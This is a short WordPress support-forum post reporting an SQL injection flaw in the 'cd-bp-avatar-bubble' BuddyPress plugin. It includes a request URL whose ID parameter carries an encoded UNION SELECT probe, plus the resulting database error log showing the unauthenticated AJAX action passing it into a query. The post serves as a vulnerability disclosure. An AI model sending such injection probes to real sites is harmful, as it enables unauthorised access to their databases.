SQL Injection

  • Resolved demon_ru

    (@demon_ru)


    8 years, 8 months ago

    I think that this plugin is possible to sql injection.
    url like: /wp-admin/admin-ajax.php?action=cd_ab_the_avatardata&ID=if%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&type=user

    error log:
    FastCGI sent in stderr: “,NULL,NULL,NULL#)’ at line 1 в ответ на запрос SELECT id, user_id, field_id, value, last_updated FROM wp_bp_xprofile_data W
    HERE field_id = 15 AND user_id IN (if) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#), выполненный do_action(‘wp_ajax_nopriv_cd_ab_the_avatardata’), call_user_func_array, cd_ab_the_avat
    ardata, cd_ab_get_the_userdata, xprofile_get_field_data, BP_XProfile_ProfileData::get_value_byid”

    plugin was disabled.

    https://www.ads-software.com/plugins/cd-bp-avatar-bubble/

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘SQL Injection’ is closed to new replies.